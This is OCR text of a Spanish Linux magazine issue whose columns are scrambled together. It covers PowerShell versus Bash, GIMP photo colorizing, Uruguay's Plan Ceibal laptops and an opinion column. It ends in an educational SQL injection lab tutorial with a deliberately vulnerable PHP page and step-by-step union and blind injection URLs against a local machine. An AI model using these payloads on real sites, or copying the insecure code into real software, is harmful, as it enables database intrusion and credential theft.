Para los usuarios de linux/unix, forma en la que la encontrarán más que desean utilzar una sintaxis
recordarán que podemos hacer lo comúnmente por Internet, es un diferente para redactar comandos,
mismo utilzando el comando man.
Intérprete de Comandos. Su nombre pueden especificar un intérprete
es acrónimo de “Bourne­Again Shel”, diferente como su shel de usuario.
La cantidad de “coincidencias” que haciendo un juego de palabras (born­
encontramos
entre
Windows again significa renacimiento) sobre el En algunos sistemas, tal como BSD,
PowerShel y la Shel de Unix/Linux Bourne shel (sh), que fue uno de los /bin/sh es un Bourne shel o un
es increíble. . tanto así que los de primeros intérpretes importantes de equivalente, pero en otros sistemas
Redmond decidieron “incluir” (por no Unix.
como muchas distribuciones de
decir copiar descaradamente) el
Linux, /bin/sh es un enlace simbólico
sistema de alias que usamos en Y bueno, evitando un poco la historia a un shel compatible con más
Linux, es decir, Microsoft nos viene a y entrando de leno a las fortalezas características (como Bash).
vender la idea “revolucionaria” de del Bash, podemos decir que consiste
poder renombrar sus comandos para en la interfaz de usuario tradicional de Los comandos que aportan los
elegir los que más te gusten o los que los sistemas operativos basados en intérpretes, pueden usarse a modo
mejor recuerdes. . ¡esto se ve en Unix y similares como GNU/Linux, es de guión si se escriben en ficheros
Linux desde hace años! Digamos. . decir, lo que conocemos como “la ejecutables denominados shel­
¡desde el inicio! Pero démosle algo de consola” o “terminal” (estrictamente la scripts, de este modo, cuando el
17 www.tuxinfo.com.ar



­Ayuda en pantala
shel scripts están basados en los
­Ayuda en línea (representa
permisos otorgados en el Sistema
un costo para ti, porque la
­Actualización continua en los
vende Microsoft)
comandos y sus funciones
­ Interacción con SQL, I S y
­ Podemos utilzar cualquier intérprete
Exchange
de comandos para bash y shel
­ Poca portabildad debido a la (mayor versatildad)
diferencia entre versiones de
­ Posibildad de usar atajos de
Windows
teclado para realizar diferentes
usuario necesita hacer uso de varios ­ Para ejecutar un script, es necesario acciones
comandos o combinados de ser el creador del script, o bien, desde ­ Podemos hacer “tunneling”
comandos con her amientas, escribe la terminal, asignarle permisos de
en un fichero de texto marcado como
­ Uso de la tecla TAB para “predecir”
ejecución “momentánea” a
ejecutable, las operaciones que
los comandos coincidentes con lo
determinado usuario
posteriormente, línea por línea, el
que estás escribiendo
intérprete traducirá al núcleo para que ­ Hablando de comandos, PowerShel
las realice. Sin ser un shel utilza el mismo cliente Telnet que se
Quisiera seguir comparando más
estrictamente un lenguaje de utilzaba en Windows 95
funciones entre ambas, pero la lista
programación, al proceso de crear ­ Sólo se permite utilzar la interfaz de que he hecho de PowerShel lega
scripts de shel se le denomina PowerShel para que funcione
hasta ahí. . no puedo extenderla más,
programación shel o en inglés, shel ­ No hay “atajos” de teclado para
y la del Shel de Unix o Bash de Linux
programming o shel scripting.
copiar y pegar
seguiría creciendo ¡hasta no sé qué
punto!
Ahora lo interesante (bueno todo esto
es interesante, pero vamos con la Shel/Bash:
Como podemos ver, y ya
comparación), legamos al punto en el ­ Uso de shel scripts
documentado, no sólo es mi humilde
que veremos lo que podemos hacer
opinión, Windows PowerShel es sólo
con Windows PowerShel y lo que ­ Creación de nuevos shel scripts
una pequeña porción del pastel que
podemos hacer con Bash. . veamos ­Administración de usuarios de
representa el Shel de Unix, y
que tanta diferencia hay entre uno y manera remota
haciendo esa comparación, me
otro, ¿será tan poderoso el Shel de ­ Creación y administración de
atrevo a decir que ni siquiera es una
Windows?
eventos del Sistema
porción, es sólo una cucharadita.
­ Creación de alias
Windows PowerShel :
­ Funciones avanzadas compatibles
con cualquier aplicación que cor a
­ Uso de “cmdlets” propios de
bajo sistemas basados en UNIX (si no
Microsoft
es compatible, el mismo programador
­ Creación de “cmdlets” para
o la propia comunidad puede hacerlo
funciones específicas
compatible)
­Administración de usuarios de
­Ayuda en pantala
manera remota
­Ayuda en línea, en foros, wikis,
­ Creación y administración de
revistas, etc.
Rafael Muril o Mercado
linxack@gmail.com
eventos de Sistema
­ Gran nivel de portabildad gracias a
­ Creación de alias
que Bash está basado en el Shel de
­ Funciones avanzadas en lenguaje
UNIX, prácticamente cualquier script
propio de la aplicación (no compatible shel que hagas en tu sistema, servirá
con otras aplicaciones como el
en cualquier otro basado en
Lenguaje C)
UNIX/Linux
­ Los permisos para la ejecución de
18 www.tuxinfo.com.ar



Dar color a una
foto antigua
POR MARCOS "ANUBIS4D" CABALLERO
Mi primer empleo, cuando recién imagen se activan los 3 canales de 8 los minilabs cuando copiábamos
aprendía a usar todo el Photoshop bits para desbalancear los valores negativos (quienes hayan hecho
(sí hubo una época a final de los en la misma (si los valores RGB alguna vez una experiencia en
90´s donde uno podía conocerlo están equilbrados tenemos una laboratorio, recordarán el filtrado del
TODO), fue trabajar para un imagen de grises que contiene 3 negativo para la copia).
laboratorio fotográfico componiendo veces más información ir elevante).
imágenes para varias sucursales.
Dependiendo de la imagen que nos
Reconstruía
imágenes, Paso 1: ya mencioné que Gimp toque, debemos cor egir (como
bor aba/agregaba gente en retratos, NO POSEE CAPAS DE AJUSTE vemos en el ejemplo), los tonos
o daba color a viejas fotos. En (Mis alumnos de Photoshop han medios. Mis alumnos de photoshop
Photoshop aparecieron las capas de visto este ejemplo pero con dichas se habrán cansado de escuchar las
ajuste que simplificaron todo, pero capas y máscaras), y por elo razones por las cuales no
antes de eso, pocos nos acordamos deberemos usar copias de capas usaríamos TONO/Saturación para
de cómo era trabajar con muchas (consumiendo más memoria, pero colorizar; y los cuidados que
capas. GIMP se encuentra ánimo, la memoria es barata). debemos tener con la luminosidad
actualmente como aquel viejo Primeramente se duplica la capa de la imagen en un modelo aditivo
Photoshop, ya que también carece actual, X+1 veces, (siendo “X” la de color (RGB). OJO.
de las mencionadas capas de cantidad de colores que deseamos
ajuste. Este tutorial les permitirá poner en la imagen), la capa que se
sortear esta dificultad, pero les
Lo importante en esta capa (la
encuentra debajo de todas, queda
advierto que usarán más tiempo y
segunda contando desde abajo
en grises.
más pasos.
hacia ar iba) es encontrar el tono
piel que se cor esponda con la
Paso 2: En los ajustes de imagen luminosidad de la imagen.
Paso 0: Abrir la imagen y activar la tenemos los controles de BALANCE
opción de menú IMAGEN > MODO > DE COLOR, con el cual se logran
RGB. De esta manera, en nuestra
Paso 3: El balance de color se
los mismos efectos que hacíamos en repite con diferentes valores para
20 www.tuxinfo.com.ar


cada capa (excepto la primera, que transparentar la imagen.
estado en algunos de mis cursos,
está abajo de todo), si usan
probablemente se sorprenderán de
thumbnails muy pequeños es Paso 5: Una vez que tuve la la cantidad de pasos que he hecho
conveniente nombrar las capas con máscara de la capa piel, usé esa para dar color a esta imagen cuando
el color que tendrán.
máscara invertida como máscara de las CAPAS DE AJUSTE nos faciltan
la capa donde le doy color al traje de la vida muchísimo y evitan
Paso 4: Como se ve en la imagen, baño, de esta manera el color verde semejante PILA DE IMÁGENES,
ya hay varias capas "coloreadas", de la misma no se mezcla con la pero es así como trabajábamos
por así decirlo. Si bien ahora es sólo piel. Conviene tener esto en cuenta hace una década atrás antes que
cuestión de "eliminar lo que sobra en para cada encuentro de colores (en dicha her amienta apareciera en
cada una", muchos incluso hoy en photoshop es mucho más fácil y Photoshop; hoy en día duplicar
día (aunque no lo crean) usan la seguro, en GIMP siempre capas parece un ejercicio tonto, y
her amienta ERASER (goma de recomiendo mucho cuidado porque suficiente, pero hubo una época en
bor ar) para sacar algo de una capa. el er or está ahí nomás).
la cual las computadoras tenían 32
Me he cansado explicar en charlas,
o 64 megabytes de RAM en el
tutoriales, y cursos, que NO USEN Paso 6: Bueno, como ya se puede sistema. . Donde escanear una
ESA HERRAMIENTA NUNCA MÁS ver, cada capa de color puede ser imagen de 32 megas y duplicar
ya que no sólo no tiene sentido en el modificada en cualquier momento, capas implicaba que el archivo en
mundo digital, sino que si la usamos en este caso cor í el tono de color memoria pasaba a ocupar 32, 64Mb
en una capa FONDO y cambiamos en la capa VERDE para convertirlo y mucho más. . Windows 95 se
el botón secundario, la goma se en VIOLETA. Como verán todavía colgaba y perdíamos horas de
comporta como UN PINCEL MÁS puedo seguir editando las máscaras trabajo (si, dije horas porque salvar
(esta her amienta es una pesada si deseo mayor nivel de detales. versiones era una locura en los
carga que viene del macpaint en los Algo importante a realizar es discos de antes, que tenían como
años 80`s supongo). Como mis desaturar los colores, ya que en las mucho 500 megabytes o 1 GB si
alumnos se habrán HARTADO de cámaras de dicha época la rompías el chanchito). GIMP sin
escuchar, se deben usar las impresión se hacía con tiempos de dudas puede darse el lujo de tener
máscaras de capa (cosa maravilosa obturación largos o condiciones de una forma arcaica de trabajo (de los
si las hay) que aparecieron alá en luz donde sobraban unos años 90) y prescindir de dicha
los 90´s en Photoshop y diafragmas, razón por la cual el color her amienta ya que los equipos
transformaron la forma de trabajar no es tan poderoso como podríamos actuales cuentan con mucha
completamente. Se crea una encontrar en una película de baja memoria
y
poder
de
máscara negra por cada capa, sensibildad (donde debíamos usar procesamiento. . Pero no culpen a
entonces sólo se verá la capa de T/O largos y los colores se los diseñadores por preferir hacer
fondo (la primera de abajo), ya que saturaban), por elo dar color implica en pocos pasos lo que al usuario de
todas
serán
completamente como paso final DESATURAR, no GIMP le toma un buen rato. . Ahí es
transparentes. En cada capa queremos que se note demasiado donde este programa se queda
usaremos el pincel y pintaremos con nuestra mano en la imagen más alá corto.
BLANCO en todas aquelas áreas de lo obvio.
que no deseemos que tengan color;
Una vez dominada la técnica, no
y con negro donde deseemos Quienes conocen Photoshop o han debería tomarles ni 10 minutos
21 www.tuxinfo.com.ar






piensan convertirse en verdaderos
profesionales, les recomiendo y
recalco que compren una MAC
(UNIX) con Photoshop Extended
CS5 ya que sólo en esta plataforma,
el workflow permite ejecutarla
rápido, hacer más en menos tiempo
(léase más plata). Al menos hasta
que Adobe porte Photoshop para
linux o el desar olo de GIMP
avance, pero sabemos que lo
segundo es más difícil que lo
primero (después de todo Adobe
tenía un Photoshop para IRIX SGI).
colorear una foto si usan photoshop versión resumida del tutorial que
y es esperable que en GIMP (por no hice en mi web/blog, donde hay
tener capas de ajuste) les tome 20 o varios pasos extra que son más que
30 minutos.
recomendables para los que están
avanzados, como por ejemplo la
Recuerdo que en aquela época de selección con trazados, o canales de
Photoshop 4, me perdía mucho con color.
cuál capa mostraba u ocultaba, así
que se los redondeo en 45 minutos. Cuando hablo de esto lo hago
Este tiempo está pensado para 4 o 5 puramente desde la técnica; con
Marcos “Anubis4D” Cabal ero
ht p:/ www.anubis4d.com.ar
colores, si agregan más. . Hagan la GIMP podemos trabajar de la misma
ht p:/ marquitux.blogspot.com
cuenta.
forma en que yo lo hacía hace 10
twit er: @anubis4d
años con Photoshop (win95/98. . Yo
Este tutorial es básicamente una era un adolescente). Ahora bien, si
22 www.tuxinfo.com.ar


Proyecto Ceibal
POR NAUDY VILLARROEL URQUIOLA
El Plan Ceibal es un proyecto socio contenidos adecuados, además de la responsable de la tecnología para el
educativo implementado por el participación familar y social.
beneficio del niño y la famila.
gobierno de la República Oriental del
Uruguay. Creado por Decreto Los principios estratégicos que El Plan Ceibal desde su incursión ha
Presidencial con fecha del 18 de Abril encier a este proyecto son: la presentando avances significativos
de 2007, con el fin de proporcionar a equidad, igualdad de oportunidades que mencionaremos a continuación:
cada escolar y maestro de la escuela para todos los niños y todos los
pública una computadora portátil, jóvenes, democratización del
capacitar a los docentes en el uso de
En mayo del 2007 se inicia una
conocimiento, así como también de
dicha her amienta, y promover la
prueba piloto en Vila Cardal
un aprendizaje, no sólo a la
elaboración de propuestas educativas
(departamento de Florida), con la
educación que se les da en la
acordes con las mismas. El
puesta en marcha para 150 alumnos
Escuela, sino en aprender elos
Significado de la palabra “Ceibal” es:
y sus profesores. Vila Cardal es un
mismos a utilzar una tecnología
"Conectividad
Educativa
de
pueblo de 1.290 habitantes y una
moderna.
Informática Básica para el
sola escuela de 150 niños. Para esta
Aprendizaje en Línea".
etapa se utilzan equipos que fueron
El proyecto desar ola una cultura donados por One Laptop Per Child
colaborativa en cuatro líneas: niño­ (OLPC).
Objetivos del Plan Ceibal
niño, niño­maestro, maestro­maestro
y niño­famila­escuela. Promueve la A modo de plan piloto, este período
El Plan Ceibal busca promover la veracidad y criticidad tecnológica en sirvió para solucionar las
inclusión tecnológica con el fin de la comunidad pedagógica respetando complicaciones que todo gran
disminuir la brecha digital que existe a los principios éticos.
proyecto encuentra al ponerse en
respecto de otros países. No
marcha.
obstante, la sóla inclusión de la De igual modo, este sistema busca la
tecnología en las escuelas no formación y actualización de los
asegura el cumplimiento de la meta si
Para Agosto 2009 se comenzó a
docentes, así como también la
no se la acompaña de una propuesta
ampliar gradualmente el alcance del
implicación y apropiación, tanto en el
educativa acorde a los nuevos
Plan Ceibal abarcando a las
área técnica como en la pedagógica,
requerimientos, tanto para los
instituciones de educación privadas.
faciltando el uso educativo de los
maestros, como sus alumnos y
En octubre de ese mismo año se
nuevos recursos. Además genera
familas.
termina de completar el plan en todos
sistemas de apoyo y asistencia los departamentos del interior del
técnico pedagógica específica país.
Es así que el Plan se basa en un destinada a las experiencias
completo sistema que busca escolares, asegurando su adecuado
garantizar no sólo el uso de los desar olo. De esta manera, involucra En octubre del 2010 el Plan Ceibal
recursos tecnológicos, sino también la a los padres en el acompañamiento y comienza su segunda etapa;
formación docente, la elaboración de promoción de un uso adecuado y entregando computadoras a los
23 www.tuxinfo.com.ar


alumnos del ciclo básico de unidades externas de tipo estándar, a unidades forman una red
enseñanza secundaria pública y través de sus tres puertos USB.
autogestionada, donde cada uno de
alumnos de UTU.
los clientes es, al mismo tiempo, un
La tapa puede girarse totalmente y enrutador. Así, la red extiende su
Cabe destacar, que para levar a cabo convertir el aparato en una suerte de cobertura gracias a la presencia de
este proyecto de gran envergadura se tableta sin teclado, aunque el los propios aparatos, ya que cada
requiere de muchos colaboradores, siguiente prototipo XO­2 incluirá una uno es enrutador del siguiente, de
en función de elo nace el RAP­ pantala táctil.
manera que forman una cadena que
Ceibal.
no depende de nodos centrales.
También están compuestas por una
¿Qué es el RAP­Ceibal?
webcam en la tapa, micrófono, dos La conectividad con otras máquinas
altavoces, lector de tarjetas SD, está apoyada por un sistema de
La Red de Apoyo al Plan Ceibal varios botones tipo consola de juegos visualización del entorno local,
(RAP­Ceibal) fue creada para apoyar y LEDs diversos para teclado y cercano y lejano. Unas teclas de
el desar olo del Plan. Cuenta con batería.
función ilustradas con símbolos
voluntarios en todo Uruguay y trabaja
sencilos acceden a estos tres niveles
en grupos formados en cada
de visualización del entorno.
localidad. Sus integrantes son
voluntarios y no requieren de
La otra pieza clave consiste en el
conocimientos informáticos, ya que su
empleo del famoso entorno educativo
objetivo es colaborar a través de
Squeak, que es un mundo de objetos
distintas modalidades como por
interactivos con vida propia gracias al
ejemplo: participar de la entrega de
lenguaje Smaltalk (el propio Squeak
los equipos, realizar actividades con
está escrito en este lenguaje),
padres y familares, desar olar
mediante el cual niños de cualquier
aspectos técnicos, ayudar a los niños
edad aprenden conceptos gracias a
a dar sus primeros pasos con los
la experimentación directa con
equipos, entre otras.
gráficas tortuga y multimedia.
Componente de Software del
Componente de Hardware del Equipo.
Además de Squeak/eToys, el sistema
Equipo
contiene estas otras aplicaciones:
El sistema estaba basado navegador web, lector de RSS,
El aparato es pequeño, incluso inicialmente en una licencia GNU con chat/videoconferencia, un editor de
demasiado para ser manejado por las núcleo Linux y un sistema de texto derivado del Abiword, Tam­Tam
manos de un adulto. El hardware de escritorio ultra simple en el que las (una aplicación sencila de música) y
la máquina está diseñado para que ventanas siempre se encuentran Memory (un juego de memoria
permita una larga duración de la maximizadas.
Hay
controles musical).
batería, y no para ser alrededor de la ventana, en forma de
extremadamente rápida. Las baterías marco, que pueden mostrarse u Usa como lenguajes de programación
tienen una duración de días, no de ocultarse mediante la presión de una Python, JavaScript, Csound (lenguaje
horas, gracias a un procesador con tecla. La OLPC sólo puede realizar de síntesis sonora) y el propio
baja frecuencia de reloj.
tareas básicas: escribir documentos, entorno Squeak, aparte de los
elaborar dibujos, entrar a Internet, usados por otros programadores.
El portátil posee dos grandes antenas juegos sencilos y escuchar música,
de WiFi, que son al mismo tiempo los ya que está diseñado para quienes A continuación les detalamos los
cier es de la tapa. No tiene disco duro nunca antes han tenido una PC.
requerimientos para optar y ser parte
sino memoria flash como dispositivo
activa de este proyecto.
para almacenar el sistema operativo y Una de las piezas clave del proyecto,
los datos del usuario. La misma en lo que se refiere al software de Pasos para realizar la compra de
puede expandirse por medio de comunicaciones, consiste en que las laptop del forma particular para
24 www.tuxinfo.com.ar



sociedad de la información de
América Latina y el Caribe.
Deseo manifestar un especial
agradecimiento a todo el equipo que
labora en el Plan Ceibal, en especial
a las personas que me suministraron
la información necesaria para la
elaboración de este artículo: Lic.
Florencia González (Área de
Comunicación
y
Realización
Audiovisual), Lic. Alejandra Alcántara
(Área de Comunicación y Realización
Audiovisual), Inés Blixen (Portal
Ceibal), Yeanina Merlo (Mesa de
Ayuda), Natalia González (Mesa de
Ayuda).
alumnos de Colegios y Liceos quien se asignará la Laptop, junto con
Privados son los siguientes:
la Declaración Jurada que se Para mayor información :
completará a continuación. De no
1. Todos los alumnos de Colegios presentarse ambos documentos NO Plan Ceibal
Privados de 1º a 6º de Educación se efectuará la venta.
www.ceibal.edu.uy
Primaria y Liceos Privados de 1º a 3º
de Ciclo Básico podrán adquirir su 5. En caso de que quien firme la Av. Italia 6201 CP: 11500
laptop levando adelante los pasos Declaración Jurada no pueda asistir Edificio Los Ceibos
cor espondientes para elo.
en la fecha asignada para el pago y Montevideo, Uruguay
retiro del equipo, puede autorizar a Tel.: (598) (02) 6015773
2. Los alumnos de Colegios Privados otra persona a hacerlo, completando
adheridos a Plan Ceibal podrán gozar y entregando la siguiente Carta de
de las bonificaciones existentes para Autorización a Tercero
la compra de laptops, en base a la
anualidad que se pague.
6.
Más
detales
en
ht p:/ latu30.latu.org.uy/pls/portal/latu_
3. Los alumnos de Colegios NO portal.cbl_muestro_cond_compras?h
adheridos a Plan Ceibal, no _tipo_privado=1&h_grado=A
accederán a ningún tipo de
Naudy Vil ar oel Urquiola
bonificación, abonando por el equipo Plan Ceibal y Premio Frida 2011
twit er: @naudyu
el costo total cor espondiente al
mismo.
El Plan Ceibal ha rendido sus frutos y
ha sido galardonado con el Premio
4. Para efectuar la compra será Frida, éste es el reconocimiento
excluyente presentar copia del otorgado a los proyectos que más
documento de identidad del usuario a han contribuido al desar olo de la
25 www.tuxinfo.com.ar


Opinión
Vértigo
POR CLAUDIO DE BRASI
Cuando legaron acelerar más y más cuando legaron
las PC. Hubo un los CD­ROM, DVD y la aceleración
nivel
de gráfica para 3D. Algunos desar olos
fragmentación
ya eran planeados a 2 años o
que incluso hoy incluso año y medio.
asustaría,
muchas
Los celulares hace 12 años no
empresas se enviaban mensaje de texto, y hace
dedicaron
a 10 aparecía el primer modelo con
Una de las cosas de la tecnología
sacar su propio capacidad de grabar sonido (Un
actual es que su desar olo es medio equipo en base a las Sony), hace 9 de la pantala a color
lento, obviamente leva tiempo. especificaciones básicas de IBM, y 7 de la cámara fotográfica. Si uno
Pero, su implementación es algo pero estos no eran 100%, miles de lo piensa, suena casi cavernario y
que ya da vértigo. Hagamos un poco equipos salieron a la cale con una es a una década promedio.
de historia y veremos. Cuando esto velocidad y características que
de la computación empezó alí por superaban al IBM­PC pero todas Hoy día la cosa se ha acelerado a
fines del 70, había una computadora terminaron desapareciendo por el un nivel que casi roza la demencia,
lamada Osborne.
problema de compatibildad.
una empresa es capaz de lanzar 6 a
18 modelos de notebook o netbook
Esta fue la primera computadora Cuando salió al mercado la primera para competir en un mercado donde
portable. (Pantala de 5" 1 a 4 BIOS 100% compatible, el mercado la diferencia es más bien poca.
unidades de disco de 5"1/4 CP/M se disparó de nuevo, pero esta vez
como S.O. y baterías en un gabinete los precios cayeron abruptamente ya Los celulares salen a una velocidad
que pesaba entre 10 y 17Kg, que el problema, y la competencia que hasta los desar oladores se
(dependiendo de la configuración).
se animó un poco y luego se
estancó.
confunden. (Motorola consideró
dejar de dar soporte a un teléfono
El Gerente de la compañía que las
que había lanzado al mercado 3
fabricaba, (creyendo que esto tenía Poco después empezó una meses antes).
el mismo ritmo que los competencia por los programas,
electrodomésticos
comunes), donde evidentemente estaba la Hoy ya no hay muchos casos de
anunció que estaba en desar olo la diferencia para hacer dinero, los una versión de software a 3 años.
Osborne I , la gente dejó de comprar desar olos pasaron a periodos de Ya se habla de sistemas operativos
al Osborne pensando que ya legaba menos de 3 años. posteriormente cada 6 meses o de grandes
la nueva y la empresa queda con los accesorios de hardware, placas modificaciones a 24 meses como
stock muy alto que repentinamente VGA, Módem/FAX, Monitores e mucho.
se inmovilzó. La empresa quebró.
impresoras. La cosa se empezó a
26 www.tuxinfo.com.ar




En Software uno podría hablar de había fracasado, El PDA de Palm
upgrades mayores en poco tiempo. parecía que no iba a poder contra una
Firefox estaba en la versión 4.0 en agenda y el iPod se creía que no
abril y en Octubre la versión 7.0.
tenía mucho futuro. Hoy viendo el
mercado cambiar cada 18 meses o
Ya no se habla de un problema menor menos, realmente me cuesta
de Software a solucionar en 3 o 6 imaginar a 10 años.
meses como en WinNT4. Hoy se
puede ver hablar de días u horas. (Yo Una simple oficina puede terminar en
vi 4 updates de TZData en un solo una corporación mundial y una gran
día).
empresa líder mundial puede pasar a
Claudio De Brasi
Doldraug@gmail.com
ser sólo un recuerdo.
twit er: @Doldraug
Me causa particularmente impresión
cuando en las entrevistas de trabajo El presente es así y si uno se para a
escucho al entrevistador preguntar, pensarlo, da vértigo.
PD: Hay una expresión que dice
¿Cómo se ve en la empresa a 10
"Paren el mundo, me quiero bajar",
años?. Hace 10 años el OpenGL
pero si nos bajamos enseguida nos
estaba iniciando en las PC, El Newton
vamos a ver solos.
Dedicado a tres personas que
aceleraron el mundo y la tecnología
informática:
Dennis MacAlistair Ritchie: creador
del lenguaje C, miembro creador de
Unix.
Steve Jobs: Creador de una de las
empresas más pujantes de la historia.
John McCarthy: el padre de la IA,
inventor de Lisp.
Osborne, primera computadora portable
27 www.tuxinfo.com.ar


sql injection
Guerreros de la oscuridad
ACLARACIÓN: El contenido de este artículo tiene un fin
educativo, y para prevención y concientización del uso de
buenas prácticas de programación. Ni Marcelo Guazzardo, ni
los integrantes de Tuxinfo se harán responsables del mal uso
que se le pudiere dar a los conocimientos aquí explicitados.
POR MARCELO GUAZZARDO
El objetivo de LAMPP como se dice ahora, NOTA2: El ejemplo está dado como
esta nota, que si apache, mysql, php con extensiones root, ya que root en mysql tiene
puedo será el comienzo de mysql. La idea es que si tengo privilegios de File, y otros, no en
una serie de notas, será hablar tiempo arme una virtual machine todos los sitios que se puedan
del famoso sql injection, esta vez, para que se pueda seguir el artículo inyectar van a encontrar como root
mostrando una dupla muy usada y la ponga en mi página personal, el userdb, pero aunque no lo crean,
para construir sitios en internet, pero por ahora les dejo la tarea para me tocó hacer pen testing, y en
como es PHP y MYSQL.
el hogar a ustedes. ;­).
algunos estaban cor iendo como
root ¡el userdb!. La recomendación
El lector deberá tener conocimientos Comenzando
es más que obvia, JAMÁS se
mínimos de sentencias SQL, (Ya
deberá cor er una db como root en
que no es el objetivo de esta nota Para los fines de esta nota, voy a una aplicación.
explicar SQL), y se mostrarán seguir los ejemplos con el sitio que
ejemplos básicos de sentencias doy como ejemplo.
Generamos por empezar una base
SQL.
donde alojaremos algunos datos
NOTA1: Para este ejemplo, he básicos, para la muestra de sql
Para poder seguir mejor la nota, tomado y modificado algunos datos injection.
mostraré un ejemplo real de una de un paper de ka0z, lo pueden
página mal programada adrede, encontrar
en Acontinuación, el código:
para que se pueda practicar. El ht p:/ www.insecure.in/papers/Blind_
lector deberá levantar un entorno MySQL_Injection.pdf
CREATE DATABASE tuxinfo;
USE tuxinfo
CREATE TABLE `users` (

`id` INT(10) UNSIGNED NOT NULL AUTO_INCREMENT,
`name` VARCHAR(50) NOT NULL,
`password` VARCHAR(50) NOT NULL,
PRIMARY KEY

(`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
-- users --
INSERT INTO `users` VALUES (1, 'administrator', '123456');
INSERT INTO `users` VALUES (2, 'jax0r', 'muestra');
INSERT INTO `users` VALUES (3, 'otro', 'algo');

28 www.tuxinfo.com.ar

Lo que falta ahora, para los que no Luego deberán ver en su motor /var/www/buggy.php.
saben cómo agregar este código, es mysql que la base tuxinfo ha sido
ingresarlo a la base. Por ejemplo, a cor ectamente creada.
Para legar a este archivo,
este código, lo lamamos, codigo.sql,
buggy.php, voy a generar algún
y lo agregamos de la siguiente Ahora, lo que nos estaría faltando, archivo al estilo “menú”, pero no va
manera.
es agregar, una página en PHP, a ser algo muy gráfico, ya que lo
especialmente diseñada para probar único que se quiere mostrar es el
root@hack:/var/www# mysql -h
el Blind Sql Injection, la pondremos concepto.
localhost -p < codigo.sql
en algún lugar accesible por nuestro
Enter password: <aca pondrán
su password de mysql >

web server, en mi caso, como estoy A continuación, van los dos
en debian, la voy a poner en archivos.
<html>
<title>Nivel de Acceso</title>
<b>Niveles Acceso</b>
<br>
<a href="buggy.php?id=1">Administrador</a>
<br>
<a href="buggy.php?id=2">jaxor</a>
<br>
<a href="buggy.php?id=3">otro</a>

Y ahora, el famoso buggy.php
<?php
# ---- CONFIG -----
$host = 'localhost';
$dbuser = 'root';
$dbpass = 'LACLAVEDETUDB'; ## Esto cambiarlo
$dbname = 'tuxinfo';
# -----------------
echo "<title>DEMO DE BLIND SQL INJECTION</title>";
$db = mysql_connect($host, $dbuser, $dbpass);
if (!$db) {

die('No pudo conectarse: ' . mysql_error());
}
mysql_select_db($dbname,$db);

$sql = "SELECT * FROM users WHERE id=".$_GET['id'];
$query = mysql_query($sql);
if(@mysql_num_rows($query)==0){
die('No hay columnas');
}
$result=@mysql_fetch_row($query);
echo "<h2><center><u>DEMO DE SQL INJECTION<br>PARA TUX INFO</u><br><br>";
echo "<font color='#FF0000'>user_id: </font>".$result[0]."<br>";
echo "<font color='#FF0000'>username: </font>".$result[1]."<br>";
// echo "Passwd: ".$result[2]."<br>";
echo "</h2></center>";

die();
?>
Como puse ahí donde dice LACLAVEDETUDB, eso deberán cambiarlo, porque depende del entorno que ustedes
hayan elegido.
29 www.tuxinfo.com.ar


%20order%20by%201­
y vemos que la respuesta, es igual a
la que teníamos en la página
anterior.
ht p:/ 192.168.0.113/buggy.php?id=1
order by 3­
y vemos que la respuesta, es igual a
la que teníamos en la página
anterior.
ht p:/ 192.168.0.113/buggy.php?id=1
Figura 1
%20order%20by%204­
Una vez, que hemos puesto la
Entonces, vamos a empezar, luego comila, vemos que tenemos que la Bingo, acá la respuesta de la
de tener todo preparado, ¡vamos a consulta ha sido modificada, y nos consulta cambió, por lo que
empezar!
retorna, “No hay columnas”.
sabemos entonces que tenemos
una tabla con 3 columnas, lo cual es
Entramos por ejemplo a nivel.html, y Bueno, entonces, empezamos a cierto si vemos los campos de
elegimos el nivel de administrador, sospechar que la página es nuestra tabla.
esto nos redireccionará a vulnerable a blind sql injection.
buggy.php?id=1, y se verá la
Los campos son id, name , y
siguiente pantala (Figura 1)
Segundo Paso: (y el casi definitorio)
password. Pero vemos que el
campo password nunca lo veremos
Como vemos, pasamos en el query tomamos la consulta anterior, y en nuestra consulta, ¿o si?, eso es
string (Lo que va después del ?, ponemos una condición verdadera, y lo que queremos ver de a poco. .
para los que no saben, el id =1), y luego una condición falsa.
como vemos en la consulta mysql,
Bueno, acabamos de encontrar que
nos devolverá los datos que ht p:/ 192.168.0.113/buggy.php?id=1 la base de datos, tiene una tabla
imprimimos en la página php.
%20and%201=1
con 3 columnas, pero aún no
sabemos cómo se lama la base de
Inyecciones de veneno
datos (Bueno, en realidad nosotros
y luego
sabemos, porque lo tenemos
cor iendo local, pero lo divertido es
Bueno, vamos a empezar con algo ht p:/ 192.168.0.113/buggy.php?id=1 averiguarlo remotamente, ¡ahora
básico, en este caso es poner una ' %20and%201=0
vamos a ver eso!).
(comila simple), al final del query
string, quedaría así.
Y si vemos que en la respuesta de la Si sabemos que la base tiene 3
segunda, faltan datos, ¡es porque columnas, vamos a usar la función
ht p:/ 192.168.0.113/buggy.php?id=1' casi seguro estamos ante una sql unión, (No voy a explicitar sql básico
injection!.
pero lo que hace unión, es juntar
dos consultas, al parámetro id, le
NOTA: en mi caso la ip, es Buscando la cantidad de columna de pasaremos un número negativo,
192.168.0.113, esta es la ip del dhcp la tabla de la inyección.
como ­1, para anular la primer parte
que me dio la red casera mía, pero
de la consulta, por lo que
puede variar, no es ningún problema
efectivamente, la consulta que
esto.
Probamos con la siguiente página
realizaremos es la segunda), ahora
ht p:/ 192.168.0.113/buggy.php?id=1 lo veremos.
30 www.tuxinfo.com.ar




ht p:/ 192.168.0.113/buggy.php?id=­
1%20union%20select%20user%28
%29,@@datadir,3­
Acá por ejemplo vemos, el usuario
de la base de datos, y también el
directorio raíz del mysql.
Figura 2
Recordemos que vimos que
estamos cor iendo mysql 5.x, esto
es una buena noticia, ya que al
tener la base de datos lamada
information_schema. Con esta base
de datos, podemos hacer consultas
para ubicar todas las BASES DE
DATOS a las que tengamos
Figura 3
permisos con nuestro usuario (En
este caso root), y desde esa base,
todas las tablas, y aún más,
¡bajarnos los datos de esa tabla!.
Existen en internet, miles de
tutoriales que hablan de esto, unos
más teóricos que otros, pero lo que
vamos a tratar, es mostrar en líneas
generales algo de teoría, y luego,
Figura 4
vamos en esta primera entrega, a
mostrar el uso de una her amienta
(¡obviamente con fines educativos!),
Empezando
a
recolectar comentaré y lo podrán probar para poder automatizar las tareas.
información
ustedes en su entorno (Figura 3)
Si tengo tiempo, para una segunda
Lo que sigue a continuación, son los ht p:/ 192.168.0.113/buggy.php?id=­
entrega, se mostrarán otras cosas
primeros pasos para una injection 1%20union%20select%20database
que se pueden hacer al descubrir un
sql.
